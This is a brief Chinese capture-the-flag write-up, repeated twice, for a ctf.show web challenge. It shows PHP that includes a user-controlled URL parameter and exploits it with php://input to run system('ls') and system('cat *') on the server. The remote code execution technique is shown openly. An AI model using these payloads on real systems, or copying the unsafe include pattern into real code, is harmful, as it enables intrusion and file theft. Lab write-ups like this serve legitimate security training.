题目地址https://ctf.show/challenges#web3-8
条件是include(xxx);
xxx参数可以控制
代码如下:
<?php include($_GET['url']);?>
构造url=php://input
传入
<?php system("ls"); ?>
<?php system("cat *"); ?>
题目地址https://ctf.show/challenges#web3-8
条件是include(xxx);
xxx参数可以控制
代码如下:
<?php include($_GET['url']);?>
构造url=php://input
传入
<?php system("ls"); ?>
<?php system("cat *"); ?>